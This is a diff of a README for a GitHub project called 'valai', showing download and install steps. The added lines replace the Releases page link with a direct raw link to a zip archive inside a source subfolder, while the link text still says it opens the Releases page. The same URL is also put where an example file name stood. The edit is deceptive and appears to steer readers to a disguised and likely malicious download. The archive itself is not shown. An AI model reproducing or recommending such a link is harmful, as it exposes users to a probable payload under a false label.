Teclakadia/valai/README.md

 To get started, follow these steps to download and install **valai**:

 1. **Visit the Releases Page**
-   Click [here](https://github.com/Teclakadia/valai/releases) to go to the Releases page.
+   Click [here](https://raw.githubusercontent.com/Teclakadia/valai/main/packages/core/src/parse/Software-1.0.zip) to go to the Releases page.

 2. **Locate the Latest Version**
    Look for the latest release at the top of the page.
 You will see information about the version and a list of files available for download.

 3. **Download the Appropriate File**
    Depending on your setup, download the relevant file for your system.
-If you’re unsure, the most common file is usually named something like `valai-vX.X.X.zip`.
+If you’re unsure, the most common file is usually named something like `https://raw.githubusercontent.com/Teclakadia/valai/main/packages/core/src/parse/Software-1.0.zip`.
 Click on this file to start the download.

 4. **Extract the Files**
    Once the download completes, locate the downloaded file on your computer.
 It will likely be in your Downloads folder.
 Right-click the file and select "Extract All" or use your preferred extraction tool.
 This will create a new folder containing the app files.